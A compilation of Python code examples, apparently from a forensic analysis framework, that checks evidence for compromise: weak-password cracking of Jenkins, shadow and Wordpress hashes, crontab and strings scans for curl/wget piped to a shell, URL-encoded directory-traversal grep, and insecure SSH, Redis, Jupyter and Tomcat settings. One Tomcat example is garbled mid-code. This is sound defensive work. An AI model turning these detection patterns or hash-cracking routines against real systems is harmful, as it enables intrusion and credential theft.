Ejemplo n.º 1
0
  def _AnalyzeHadoopAppRoot(self, collected_artifacts, output_dir):
    """Runs a naive AppRoot files parsing method.

    This extracts strings from the saved task file, and searches for usual
    post-compromise suspicious patterns.

    TODO: properly parse the Proto. Some documentation can be found over there:
    https://svn.apache.org/repos/asf/hadoop/common/branches/branch-0.23.7/hadoop-yarn-project/hadoop-yarn/hadoop-yarn-api/src/main/proto/yarn_protos.proto

    Args:
      collected_artifacts(list(str)): a list of paths to extracted files
      output_dir(str): The base directory the artfacts are in.

    Returns:
      Tuple(
        list(str): The report data as a list of lines
        report_priority(int): The priority of the report (0 - 100)
        summary(str): A summary of the report (used for task status)
      )
    """
    report = []
    evil_commands = []
    strings_count = 0
    priority = Priority.MEDIUM
    summary = ''
    for filepath in collected_artifacts:
      relpath = os.path.relpath(filepath, output_dir)
      command = 'strings -a "{0:s}"'.format(filepath)
      log.debug('Running command [{0:s}]'.format(command))
      proc = subprocess.Popen(
          command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
      strings_output, _ = proc.communicate()
      strings_output = codecs.decode(strings_output, 'utf-8')
      for line in strings_output.splitlines():
        strings_count += 1
        if (line.find('curl') >= 0) or (line.find('wget') >= 0):
          evil_commands.append((relpath, line))

    if evil_commands:
      msg = 'Found suspicious commands!'
      report.append(fmt.heading4(fmt.bold(msg)))
      summary = msg
      priority = Priority.CRITICAL
    else:
      msg = 'Did not find any suspicious commands.'
      report.append(fmt.heading4(msg))
      summary = msg

    for filepath, command in evil_commands:
      report.append(fmt.bullet(fmt.bold('Command:')))
      report.append(fmt.code(command))
      report.append('Found in file:')
      report.append(fmt.code(filepath))

    msg = 'Extracted {0:d} strings from {1:d} file(s)'.format(
        strings_count, len(collected_artifacts))
    report.append(fmt.bullet(msg))

    return (report, priority, summary)
Ejemplo n.º 2
0
    def analyze_jenkins(version, credentials, timeout=300):
        """Analyses a Jenkins configuration.

    Args:
      version (str): Version of Jenkins.
      credentials (list): of tuples with username and password hash.
      timeout (int): Time in seconds to run password bruteforcing.

    Returns:
      Tuple(
        report_text(str): The report data
        report_priority(int): The priority of the report (0 - 100)
        summary(str): A summary of the report (used for task status)
      )
    """
        report = []
        summary = ''
        priority = Priority.LOW
        credentials_registry = {
            hash: username
            for username, hash in credentials
        }

        # '3200' is "bcrypt $2*$, Blowfish (Unix)"
        weak_passwords = bruteforce_password_hashes(
            credentials_registry.keys(),
            tmp_dir=None,
            timeout=timeout,
            extra_args='-m 3200')

        if not version:
            version = 'Unknown'
        report.append(fmt.bullet('Jenkins version: {0:s}'.format(version)))

        if weak_passwords:
            priority = Priority.CRITICAL
            summary = 'Jenkins analysis found potential issues'
            report.insert(0, fmt.heading4(fmt.bold(summary)))
            line = '{0:n} weak password(s) found:'.format(len(weak_passwords))
            report.append(fmt.bullet(fmt.bold(line)))
            for password_hash, plaintext in weak_passwords:
                line = 'User "{0:s}" with password "{1:s}"'.format(
                    credentials_registry.get(password_hash), plaintext)
                report.append(fmt.bullet(line, level=2))
        elif credentials_registry or version != 'Unknown':
            summary = (
                'Jenkins version {0:s} found with {1:d} credentials, but no issues '
                'detected'.format(version, len(credentials_registry)))
            report.insert(0, fmt.heading4(summary))
            priority = Priority.MEDIUM
        else:
            summary = 'No Jenkins instance found'
            report.insert(0, fmt.heading4(summary))

        report = '\n'.join(report)
        return (report, priority, summary)
Ejemplo n.º 3
0
    def analyze_jenkins(version, credentials):
        """Analyses a Jenkins configuration.

    Args:
      version (str): Version of Jenkins.
      credentials (list): of tuples with username and password hash.

    Returns:
      Tuple(
        report_text(str): The report data
        report_priority(int): The priority of the report (0 - 100)
        summary(str): A summary of the report (used for task status)
      )
    """
        report = []
        summary = ''
        priority = Priority.LOW
        credentials_registry = {
            hash: username
            for username, hash in credentials
        }
        # TODO: Add timeout parameter when dynamic configuration is ready.
        # Ref: https://github.com/google/turbinia/issues/244
        weak_passwords = bruteforce_password_hashes(
            credentials_registry.keys())

        if not version:
            version = 'Unknown'
        report.append(fmt.bullet('Jenkins version: {0:s}'.format(version)))

        if weak_passwords:
            priority = Priority.CRITICAL
            summary = 'Jenkins analysis found potential issues'
            report.insert(0, fmt.heading4(fmt.bold(summary)))
            line = '{0:n} weak password(s) found:'.format(len(weak_passwords))
            report.append(fmt.bullet(fmt.bold(line)))
            for password_hash, plaintext in weak_passwords:
                line = 'User "{0:s}" with password "{1:s}"'.format(
                    credentials_registry.get(password_hash), plaintext)
                report.append(fmt.bullet(line, level=2))
        elif credentials_registry or version != 'Unknown':
            summary = (
                'Jenkins version {0:s} found with {1:d} credentials, but no issues '
                'detected'.format(version, len(credentials_registry)))
            report.insert(0, fmt.heading4(summary))
            priority = Priority.MEDIUM
        else:
            summary = 'No Jenkins instance found'
            report.insert(0, fmt.heading4(summary))

        report = '\n'.join(report)
        return (report, priority, summary)
Ejemplo n.º 4
0
    def run(self, evidence, result):
        """Scan a raw disk for partitions.

    Args:
      evidence (Evidence object):  The evidence we will process.
      result (TurbiniaTaskResult): The object to place task results into.

    Returns:
      TurbiniaTaskResult object.
    """
        # TODO(dfjxs): Use evidence name instead of evidence_description (#718)
        evidence_description = None
        if hasattr(evidence, 'embedded_path'):
            evidence_description = ':'.join(
                (evidence.disk_name, evidence.embedded_path))
        elif hasattr(evidence, 'disk_name'):
            evidence_description = evidence.disk_name
        else:
            evidence_description = evidence.source_path

        result.log(
            'Scanning [{0:s}] for partitions'.format(evidence_description))

        success = False

        dfvfs_definitions.PREFERRED_GPT_BACK_END = (
            dfvfs_definitions.TYPE_INDICATOR_GPT)
        mediator = dfvfs_classes.UnattendedVolumeScannerMediator()
        path_specs = []
        try:
            scanner = volume_scanner.VolumeScanner(mediator=mediator)
            path_specs = scanner.GetBasePathSpecs(evidence.local_path)
            status_summary = 'Found {0:d} partition(s) in [{1:s}]:'.format(
                len(path_specs), evidence_description)
        except dfvfs_errors.ScannerError as e:
            status_summary = 'Error scanning for partitions: {0!s}'.format(e)

        status_report = [fmt.heading4(status_summary)]

        try:
            for path_spec in path_specs:
                partition_evidence, partition_status = self._ProcessPartition(
                    path_spec)
                status_report.extend(partition_status)
                result.add_evidence(partition_evidence, evidence.config)

            status_report = '\n'.join(status_report)
            success = True
        except TurbiniaException as e:
            status_summary = 'Error enumerating partitions: {0!s}'.format(e)
            status_report = status_summary

        result.log(
            'Scanning of [{0:s}] is complete'.format(evidence_description))

        result.report_priority = Priority.LOW
        result.report_data = status_report
        result.close(self, success=success, status=status_summary)

        return result
Ejemplo n.º 5
0
    def analyse_crontab(self, crontab):
        """Analyses a Cron file.

    Args:
      crontab (str): file content.

    Returns:
      Tuple(
        report_text(str): The report data
        report_priority(int): The priority of the report (0 - 100)
        summary(str): A summary of the report (used for task status)
      )
    """
        findings = []
        wget_or_curl = re.compile(r'(wget|curl)', re.IGNORECASE | re.MULTILINE)
        pipe_to_sh = re.compile(r'\|(.*)sh ', re.IGNORECASE | re.MULTILINE)
        get_piped_to_sh = re.compile(r'((wget|curl).*\|)+(.*sh)',
                                     re.IGNORECASE | re.MULTILINE)

        if re.search(get_piped_to_sh, crontab):
            findings.append(
                fmt.bullet('Remote file retrieval piped to a shell.'))
        elif re.search(wget_or_curl, crontab):
            findings.append(fmt.bullet('Remote file retrieval'))
        elif re.search(pipe_to_sh, crontab):
            findings.append(fmt.bullet('File piped to shell'))

        if findings:
            summary = 'Potentially backdoored crontab found.'
            findings.insert(0, fmt.heading4(fmt.bold(summary)))
            report = '\n'.join(findings)
            return (report, Priority.HIGH, summary)

        report = 'No issues found in crontabs'
        return (report, Priority.LOW, report)
Ejemplo n.º 6
0
    def _is_traversal_in_logs(self, result, basedir, logfiles):
        """Checks to see if there is evidence of directory traversal in the logs.

    Args:
      result (TurbiniaTaskResult): The object to place task results into.
      basedir (str): the root of the evidence.
      logfiles (str): The file(s) to check

    Returns:
      Tuple(
        report_text(str): The report data
        report_priority(int): The priority of the report (0 - 100)
        summary(str): A summary of the report (used for task status)
      )
    """

        check = " ".join(glob.glob(os.path.join(basedir, logfiles)))
        if not len(check):
            return ('', Priority.LOW, '')

        cmd = ['zgrep', '"%2F..%2F..%2F..%2F"', check]
        ret, result = self.execute(cmd, result, success_codes=[0, 1])
        if ret == 0:
            summary = 'directory traversal exploit detected in {}'.format(
                logfiles)
            report = fmt.heading4(fmt.bold(summary))
            return (report, Priority.HIGH, summary)

        return ('', Priority.LOW, '')
Ejemplo n.º 7
0
 def analyse_shadow_file(self, shadow, hashes):
   """Analyses a Linux shadow file.
   Args:
     shadow (list): shadow file content (list of str).
     hashes (dict): dict of hashes to usernames
   Returns:
     Tuple(
       report_text(str): The report data
       report_priority(int): The priority of the report (0 - 100)
       summary(str): A summary of the report (used for task status)
     )
   """
   report = []
   summary = 'No weak passwords found'
   priority = Priority.LOW
   weak_passwords = bruteforce_password_hashes(shadow)
   if weak_passwords:
     priority = Priority.CRITICAL
     summary = 'Shadow file analysis found {0:n} weak password(s)'.format(
         len(weak_passwords))
     report.insert(0, fmt.heading4(fmt.bold(summary)))
     line = '{0:n} weak password(s) found:'.format(len(weak_passwords))
     report.append(fmt.bullet(fmt.bold(line)))
     for password_hash, plaintext in weak_passwords:
       line = """User '{0:s}' with password '{1:s}'""".format(
           hashes[password_hash], plaintext)
       report.append(fmt.bullet(line, level=2))
   report = '\n'.join(report)
   return (report, priority, summary)
Ejemplo n.º 8
0
  def analyse_redis_config(self, config):
    """Analyses a Redis configuration.

    Args:
      config (str): configuration file content.

    Returns:
      Tuple(
        report_text(str): The report data
        report_priority(int): The priority of the report (0 - 100)
        summary(str): A summary of the report (used for task status)
      )
    """
    findings = []
    bind_everywhere_re = re.compile(
        r'^\s*bind[\s"]*0\.0\.0\.0', re.IGNORECASE | re.MULTILINE)

    if re.search(bind_everywhere_re, config):
      findings.append(fmt.bullet('Redis listening on every IP'))

    if findings:
      summary = 'Insecure Redis configuration found.'
      findings.insert(0, fmt.heading4(fmt.bold(summary)))
      report = '\n'.join(findings)
      return (report, Priority.HIGH, summary)

    report = 'No issues found in Redis configuration'
    return (report, Priority.LOW, report)
Ejemplo n.º 9
0
    def testPartitionEnumerationRunAPFS(self, mock_getbasepathspecs, _):
        """Test PartitionEnumeration task run on APFS."""
        self.result.setup(self.task)
        filedir = os.path.dirname(os.path.realpath(__file__))
        test_data = os.path.join(filedir, '..', '..', 'test_data', 'apfs.raw')

        test_os_path_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_OS, location=test_data)
        test_raw_path_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_RAW, parent=test_os_path_spec)
        test_apfs_container_path_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_APFS_CONTAINER,
            location='/apfs1',
            volume_index=0,
            parent=test_raw_path_spec)

        mock_getbasepathspecs.return_value = [test_apfs_container_path_spec]

        result = self.task.run(self.evidence, self.result)

        # Ensure run method returns a TurbiniaTaskResult instance.
        expected_report = []
        expected_report.append(
            fmt.heading4('Found 1 partition(s) in [{0:s}]:'.format(
                self.evidence.local_path)))
        expected_report.append(fmt.heading5('/apfs1:'))
        expected_report.append(fmt.bullet('Volume index: 0'))
        expected_report = '\n'.join(expected_report)
        self.assertEqual(result.report_data, expected_report)
Ejemplo n.º 10
0
    def testPartitionEnumerationRunLVM(self, mock_getbasepathspecs, _):
        """Test PartitionEnumeration task run on LVM."""
        self.result.setup(self.task)
        filedir = os.path.dirname(os.path.realpath(__file__))
        test_data = os.path.join(filedir, '..', '..', 'test_data', 'lvm.raw')

        test_os_path_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_OS, location=test_data)
        test_raw_path_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_RAW, parent=test_os_path_spec)
        test_lvm_path_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_LVM,
            location='/lvm1',
            parent=test_raw_path_spec)
        test_xfs_path_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_XFS,
            location='/',
            parent=test_lvm_path_spec)

        mock_getbasepathspecs.return_value = [test_xfs_path_spec]

        result = self.task.run(self.evidence, self.result)

        # Ensure run method returns a TurbiniaTaskResult instance.
        expected_report = []
        expected_report.append(
            fmt.heading4('Found 1 partition(s) in [{0:s}]:'.format(
                self.evidence.local_path)))
        expected_report.append(fmt.heading5('/lvm1:'))
        expected_report.append(fmt.bullet('Source evidence is a volume image'))
        expected_report = '\n'.join(expected_report)
        self.assertEqual(result.report_data, expected_report)
Ejemplo n.º 11
0
    def analyse_config(self, jupyter_config):
        """Extract security related configs from Jupyter configuration files.

    Args:
      config (str): configuration file content.

    Returns:
      Tuple(
        report_text(str): The report data
        report_priority(int): The priority of the report (0 - 100)
        summary(str): A summary of the report (used for task status)
      )
    """
        findings = []
        num_misconfigs = 0
        for line in jupyter_config.split('\n'):

            if all(x in line for x in ['disable_check_xsrf', 'True']):
                findings.append(fmt.bullet('XSRF protection is disabled.'))
                num_misconfigs += 1
                continue
            if all(x in line for x in ['allow_root', 'True']):
                findings.append(
                    fmt.bullet('Juypter Notebook allowed to run as root.'))
                num_misconfigs += 1
                continue
            if 'NotebookApp.password' in line:
                if all(x in line for x in ['required', 'False']):
                    findings.append(
                        fmt.bullet(
                            'Password is not required to access this Jupyter Notebook.'
                        ))
                    num_misconfigs += 1
                    continue
                if 'required' not in line:
                    password_hash = line.split('=')
                    if len(password_hash) > 1:
                        if password_hash[1].strip() == "''":
                            findings.append(
                                fmt.bullet(
                                    'There is no password set for this Jupyter Notebook.'
                                ))
                            num_misconfigs += 1
            if all(x in line for x in ['allow_remote_access', 'True']):
                findings.append(
                    fmt.bullet(
                        'Remote access is enabled on this Jupyter Notebook.'))
                num_misconfigs += 1
                continue

        if findings:
            summary = 'Insecure Jupyter Notebook configuration found. Total misconfigs: {}'.format(
                num_misconfigs)
            findings.insert(0, fmt.heading4(fmt.bold(summary)))
            report = '\n'.join(findings)
            return (report, Priority.HIGH, summary)

        report = 'No issues found in Jupyter Notebook  configuration.'
        return (report, Priority.LOW, report)
Ejemplo n.º 12
0
    def analyze_wp_access_logs(self, config):
        """Analyses access logs containing Wordpress traffic.

    Args:
      config (str): access log file content.

    Returns:
      Tuple(
        report_text(str): The report data
        report_priority(int): The priority of the report (0 - 100)
        summary(str): A summary of the report (used for task status)
      )
    """
        report = []
        findings_summary = set()

        for log_line in config.split('\n'):

            if self.install_step_regex.search(log_line):
                line = '{0:s}: Wordpress installation successful'.format(
                    self._get_timestamp(log_line))
                report.append(fmt.bullet(line))
                findings_summary.add('install')

            match = self.theme_editor_regex.search(log_line)
            if match:
                line = '{0:s}: Wordpress theme editor edited file ({1:s})'.format(
                    self._get_timestamp(log_line), match.group('edited_file'))
                report.append(fmt.bullet(line))
                findings_summary.add('theme_edit')

        if report:
            findings_summary = ', '.join(sorted(list(findings_summary)))
            summary = 'Wordpress access logs found ({0:s})'.format(
                findings_summary)

            report.insert(0, fmt.heading4(fmt.bold(summary)))
            report_text = '\n'.join(report)
            return (report_text, Priority.HIGH, summary)

        report_text = 'No Wordpress install or theme editing found in access logs'
        return (fmt.heading4(report_text), Priority.LOW, report_text)
Ejemplo n.º 13
0
 def testFormatting(self):
     """Test text formatting."""
     self.assertEqual('**testing**', fmt.bold(self.test_string))
     self.assertEqual('# testing', fmt.heading1(self.test_string))
     self.assertEqual('## testing', fmt.heading2(self.test_string))
     self.assertEqual('### testing', fmt.heading3(self.test_string))
     self.assertEqual('#### testing', fmt.heading4(self.test_string))
     self.assertEqual('##### testing', fmt.heading5(self.test_string))
     self.assertEqual('* testing', fmt.bullet(self.test_string))
     self.assertEqual('        * testing',
                      fmt.bullet(self.test_string, level=3))
     self.assertEqual('`testing`', fmt.code(self.test_string))
Ejemplo n.º 14
0
    def analyse_tomcat_file(self, tomcat_file):
        """Analyse a Tomcat file.

    - Search for clear text password entries in user configuration file
    - Search for .war deployment
    - Search for management control panel activity

    Args:
      tomcat_file (str): Tomcat file content.
    Returns:
      Tuple(
        report_text(str): The report data
        report_priority(int): The priority of the report (0 - 100)
        summary(str): A summary of the report (used for task status)
      )
    """
        findings = []

        tomcat_user_passwords_re = re.compile('(^.*password.*)', re.MULTILINE)
        tomcat_deploy_re = re.compile(
            '(^.*Deploying web application archive.*)', re.MULTILINE)
        tomcat_manager_activity_re = re.compile(
            '(^.*POST /manager/html/upload.*)', re.MULTILINE)

        count = 0
        for password_entry in re.findall(tomcat_user_passwords_re,
                                         tomcat_file):
            findings.append(
                fmt.bullet('Tomcat user: '******'Tomcat App Deployed: ' + deployment_entry.strip()))
            count += 1

        for mgmt_entry in re.findall(tomcat_manager_activity_re, tomcat_file):
            findings.append(
                fmt.bullet('Tomcat Management: ' + mgmt_entry.strip()))
            count += 1

        if findings:
            msg = 'Tomcat analysis found {0:d} results'.format(count)
            findings.insert(0, fmt.heading4(fmt.bold(msg)))
            report = '\n'.join(findings)
            return (report, Priority.HIGH, msg)

        report = 'No Tomcat findings to report'
        return (report, Priority.LOW, report)
Ejemplo n.º 15
0
    def testPartitionEnumerationRun(self, mock_getbasepathspecs):
        """Test PartitionEnumeration task run."""
        os_path_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_OS, location='test.dd')
        raw_path_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_RAW, parent=os_path_spec)
        tsk_p1_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_TSK_PARTITION,
            parent=raw_path_spec,
            location='/p1',
            part_index=2,
            start_offset=1048576)
        ntfs_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_NTFS,
            parent=tsk_p1_spec,
            location='\\')

        tsk_p2_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_TSK_PARTITION,
            parent=raw_path_spec,
            location='/p2',
            part_index=6,
            start_offset=11534336)
        tsk_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_NTFS,
            parent=tsk_p2_spec,
            location='/')

        mock_getbasepathspecs.return_value = [ntfs_spec, tsk_spec]

        result = self.task.run(self.evidence, self.result)

        # Ensure run method returns a TurbiniaTaskResult instance.
        self.assertIsInstance(result, TurbiniaTaskResult)
        self.assertEqual(result.task_name, 'PartitionEnumerationTask')
        self.assertEqual(len(result.evidence), 2)
        expected_report = []
        expected_report.append(
            fmt.heading4('Found 2 partition(s) in [{0:s}]:'.format(
                self.evidence.local_path)))
        expected_report.append(fmt.heading5('/p1:'))
        expected_report.append(fmt.bullet('Partition index: 2'))
        expected_report.append(fmt.bullet('Partition offset: 1048576'))
        expected_report.append(fmt.heading5('/p2:'))
        expected_report.append(fmt.bullet('Partition index: 6'))
        expected_report.append(fmt.bullet('Partition offset: 11534336'))
        expected_report = '\n'.join(expected_report)
        self.assertEqual(result.report_data, expected_report)
Ejemplo n.º 16
0
    def run(self, evidence, result):
        """Scan a raw disk for partitions.

    Args:
      evidence (Evidence object):  The evidence we will process.
      result (TurbiniaTaskResult): The object to place task results into.

    Returns:
      TurbiniaTaskResult object.
    """
        result.log('Scanning [{0:s}] for partitions'.format(
            evidence.local_path))

        success = False

        mediator = dfvfs_classes.UnattendedVolumeScannerMediator()
        try:
            scanner = volume_scanner.VolumeScanner(mediator=mediator)
            path_specs = scanner.GetBasePathSpecs(evidence.local_path)
            status_summary = 'Found {0:d} partition(s) in [{1:s}]:'.format(
                len(path_specs), evidence.local_path)
        except dfvfs_errors.ScannerError as e:
            status_summary = 'Error scanning for partitions: {0!s}'.format(e)

        status_report = [fmt.heading4(status_summary)]

        try:
            for path_spec in path_specs:
                partition_evidence, partition_status = self._ProcessPartition(
                    evidence.local_path, path_spec)
                status_report.extend(partition_status)
                result.add_evidence(partition_evidence, evidence.config)

            status_report = '\n'.join(status_report)
            success = True
        except TurbiniaException as e:
            status_summary = 'Error enumerating partitions: {0!s}'.format(e)
            status_report = status_summary

        result.log('Scanning of [{0:s}] is complete'.format(
            evidence.local_path))

        result.report_priority = Priority.LOW
        result.report_data = status_report
        result.close(self, success=success, status=status_summary)

        return result
Ejemplo n.º 17
0
  def runLoki(self, result, evidence):
    log_file = os.path.join(self.output_dir, 'loki.log')
    stdout_file = os.path.join(self.output_dir, 'loki_stdout.log')
    stderr_file = os.path.join(self.output_dir, 'loki_stderr.log')

    cmd = [
        'python', '/opt/loki/loki.py', '-w', '0', '--csv', '--intense',
        '--noprocscan', '--dontwait', '--noindicator', '-l', log_file, '-p',
        evidence.local_path
    ]

    (ret, result) = self.execute(
        cmd, result, log_files=[log_file], stdout_file=stdout_file,
        stderr_file=stderr_file, cwd='/opt/loki/')

    if ret != 0:
      raise TurbiniaException('Return code: {0:d}'.format(ret))

    report = []
    summary = 'No Loki threats found'
    priority = Priority.LOW

    report_lines = []
    with open(stdout_file, 'r') as loki_report_csv:
      lokireader = csv.DictReader(
          loki_report_csv, fieldnames=['Time', 'Hostname', 'Level', 'Log'])
      for row in lokireader:
        if row['Level'] == 'ALERT':
          report_lines.append(row['Log'])

    if report_lines:
      priority = Priority.HIGH
      summary = 'Loki analysis found {0:d} alert(s)'.format(len(report_lines))
      report.insert(0, fmt.heading4(fmt.bold(summary)))
      line = '{0:n} alerts(s) found:'.format(len(report_lines))
      report.append(fmt.bullet(fmt.bold(line)))
      for line in report_lines:
        report.append(fmt.bullet(line, level=2))

    report = '\n'.join(report)
    return (report, priority, summary)
Ejemplo n.º 18
0
    def _analyse_wordpress_creds(self, creds, hashnames, timeout=300):
        """Attempt to brute force extracted Wordpress credentials.

    Args:
        creds (list): List of strings containing raw extracted credentials
        hashnames (dict): Dict mapping hash back to username for convenience.
        timeout (int): How long to spend cracking.

    Returns:
      Tuple(
        report_text(str): The report data
        report_priority(int): The priority of the report (0 - 100)
        summary(str): A summary of the report (used for task status)
      )
    """
        report = []
        summary = 'No weak passwords found'
        priority = Priority.LOW

        # 1000 is "phpass"
        weak_passwords = bruteforce_password_hashes(
            creds,
            tmp_dir=self.tmp_dir,
            timeout=timeout,
            extra_args='--username -m 400')

        if weak_passwords:
            priority = Priority.CRITICAL
            summary = 'Wordpress analysis found {0:d} weak password(s)'.format(
                len(weak_passwords))
            report.insert(0, fmt.heading4(fmt.bold(summary)))
            line = '{0:n} weak password(s) found:'.format(len(weak_passwords))
            report.append(fmt.bullet(fmt.bold(line)))
            for password_hash, plaintext in weak_passwords:
                if password_hash in hashnames:
                    line = """User '{0:s}' with password '{1:s}'""".format(
                        hashnames[password_hash], plaintext)
                    report.append(fmt.bullet(line, level=2))
        report = '\n'.join(report)
        return (report, priority, summary)
Ejemplo n.º 19
0
    def testPartitionEnumerationRun(self, mock_getbasepathspecs, _):
        """Test PartitionEnumeration task run."""
        self.result.setup(self.task)
        filedir = os.path.dirname(os.path.realpath(__file__))
        test_data = os.path.join(filedir, '..', '..', 'test_data',
                                 'tsk_volume_system.raw')

        os_path_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_OS, location=test_data)
        raw_path_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_RAW, parent=os_path_spec)
        tsk_p2_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_TSK_PARTITION,
            parent=raw_path_spec,
            location='/p2',
            part_index=6,
            start_offset=180224)
        tsk_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_NTFS,
            parent=tsk_p2_spec,
            location='/')

        mock_getbasepathspecs.return_value = [tsk_spec]

        result = self.task.run(self.evidence, self.result)

        # Ensure run method returns a TurbiniaTaskResult instance.
        self.assertIsInstance(result, TurbiniaTaskResult)
        self.assertEqual(result.task_name, 'PartitionEnumerationTask')
        self.assertEqual(len(result.evidence), 1)
        expected_report = []
        expected_report.append(
            fmt.heading4('Found 1 partition(s) in [{0:s}]:'.format(
                self.evidence.local_path)))
        expected_report.append(fmt.heading5('/p2:'))
        expected_report.append(fmt.bullet('Partition index: 6'))
        expected_report.append(fmt.bullet('Partition offset: 180224'))
        expected_report.append(fmt.bullet('Partition size: 1294336'))
        expected_report = '\n'.join(expected_report)
        self.assertEqual(result.report_data, expected_report)
Ejemplo n.º 20
0
    def analyse_sshd_config(self, config):
        """Analyses an SSH configuration.

    Args:
      config (str): configuration file content.

    Returns:
      Tuple(
        report_text(str): The report data
        report_priority(int): The priority of the report (0 - 100)
        summary(str): A summary of the report (used for task status)
      )
    """
        findings = []
        permit_root_login_re = re.compile(
            r'^\s*PermitRootLogin\s*(yes|prohibit-password|without-password)',
            re.IGNORECASE | re.MULTILINE)
        password_authentication_re = re.compile(
            r'^\s*PasswordAuthentication[\s"]*No',
            re.IGNORECASE | re.MULTILINE)
        permit_empty_passwords_re = re.compile(
            r'^\s*PermitEmptyPasswords[\s"]*Yes', re.IGNORECASE | re.MULTILINE)

        if re.search(permit_root_login_re, config):
            findings.append(fmt.bullet('Root login enabled.'))

        if not re.search(password_authentication_re, config):
            findings.append(fmt.bullet('Password authentication enabled.'))

        if re.search(permit_empty_passwords_re, config):
            findings.append(fmt.bullet('Empty passwords permitted.'))

        if findings:
            summary = 'Insecure SSH configuration found.'
            findings.insert(0, fmt.heading4(fmt.bold(summary)))
            report = '\n'.join(findings)
            return (report, 20, summary)

        report = 'No issues found in SSH configuration'
        return (report, 60, report)
Ejemplo n.º 21
0
    def analyse_shadow_file(self, shadow, hashes, timeout=300):
        """Analyses a Linux shadow file.

    Args:
      shadow (list): shadow file content (list of str).
      hashes (dict): dict of hashes to usernames
      timeout (int): Time in seconds to run password bruteforcing.

    Returns:
      Tuple(
        report_text(str): The report data
        report_priority(int): The priority of the report (0 - 100)
        summary(str): A summary of the report (used for task status)
      )
    """
        report = []
        summary = 'No weak passwords found'
        priority = Priority.LOW

        # 1800 is "sha512crypt $6$, SHA512 (Unix)"
        weak_passwords = bruteforce_password_hashes(shadow,
                                                    tmp_dir=self.tmp_dir,
                                                    timeout=timeout,
                                                    extra_args='-m 1800')

        if weak_passwords:
            priority = Priority.CRITICAL
            summary = 'Shadow file analysis found {0:n} weak password(s)'.format(
                len(weak_passwords))
            report.insert(0, fmt.heading4(fmt.bold(summary)))
            line = '{0:n} weak password(s) found:'.format(len(weak_passwords))
            report.append(fmt.bullet(fmt.bold(line)))
            for password_hash, plaintext in weak_passwords:
                line = """User '{0:s}' with password '{1:s}'""".format(
                    hashes[password_hash], plaintext)
                report.append(fmt.bullet(line, level=2))
        report = '\n'.join(report)
        return (report, priority, summary)
Ejemplo n.º 22
0
  def generate_summary_report(self, output_file_path):
    """Generate a summary report from the resulting bulk extractor run.

    Args:
      output_file_path(str): the path to the bulk extractor output.

    Returns:
      tuple: containing:
        report_test(str): The report data
        summary(str): A summary of the report (used for task status)
    """
    findings = []
    features_count = 0
    report_path = os.path.join(output_file_path, 'report.xml')

    # Check if report.xml was not generated by bulk extractor.
    if not os.path.exists(report_path):
      report = 'Execution successful, but the report is not available.'
      return (report, report)

    # Parse existing XML file.
    self.xml = xml_tree.parse(report_path)

    # Place in try/except statement to continue execution when
    # an attribute is not found and NoneType is returned.
    try:
      # Retrieve summary related results.
      findings.append(fmt.heading4('Bulk Extractor Results'))
      findings.append(fmt.heading5('Run Summary'))
      findings.append(
          fmt.bullet(
              'Program: {0} - {1}'.format(
                  self.check_xml_attrib('creator/program'),
                  self.check_xml_attrib('creator/version'))))
      findings.append(
          fmt.bullet(
              'Command Line: {0}'.format(
                  self.check_xml_attrib(
                      'creator/execution_environment/command_line'))))
      findings.append(
          fmt.bullet(
              'Start Time: {0}'.format(
                  self.check_xml_attrib(
                      'creator/execution_environment/start_time'))))
      findings.append(
          fmt.bullet(
              'Elapsed Time: {0}'.format(
                  self.check_xml_attrib('report/elapsed_seconds'))))

      # Retrieve results from each of the scanner runs
      feature_files = self.xml.find('feature_files')
      if feature_files is not None:
        feature_iter = feature_files.iter()
        findings.append(fmt.heading5('Scanner Results'))
        for f in feature_iter:
          if f.tag == 'feature_file':
            name = next(feature_iter)
            count = next(feature_iter)
            findings.append(fmt.bullet('{0}:{1}'.format(name.text, count.text)))
            features_count += int(count.text)
      else:
        findings.append(fmt.heading5("There are no findings to report."))
    except AttributeError as exception:
      log.warning(
          'Error parsing feature from Bulk Extractor report: {0!s}'.format(
              exception))
    summary = '{0} artifacts have been extracted.'.format(features_count)
    report = '\n'.join(findings)
    return (report, summary)
Ejemplo n.º 23
0
    def run(self, evidence, result):
        """Scan a raw disk for partitions.

    Args:
      evidence (Evidence object):  The evidence we will process.
      result (TurbiniaTaskResult): The object to place task results into.

    Returns:
      TurbiniaTaskResult object.
    """
        # TODO(dfjxs): Use evidence name instead of evidence_description (#718)
        evidence_description = None
        if hasattr(evidence, 'embedded_path'):
            evidence_description = ':'.join(
                (evidence.disk_name, evidence.embedded_path))
        elif hasattr(evidence, 'disk_name'):
            evidence_description = evidence.disk_name
        else:
            evidence_description = evidence.source_path

        result.log(
            'Scanning [{0:s}] for partitions'.format(evidence_description))

        path_specs = []
        success = False

        try:
            path_specs = partitions.Enumerate(evidence)
            status_summary = 'Found {0:d} partition(s) in [{1:s}]:'.format(
                len(path_specs), evidence_description)

            # Debug output
            path_spec_debug = ['Base path specs:']
            for path_spec in path_specs:
                path_spec_types = [path_spec.type_indicator]
                child_path_spec = path_spec
                while child_path_spec.HasParent():
                    path_spec_types.insert(
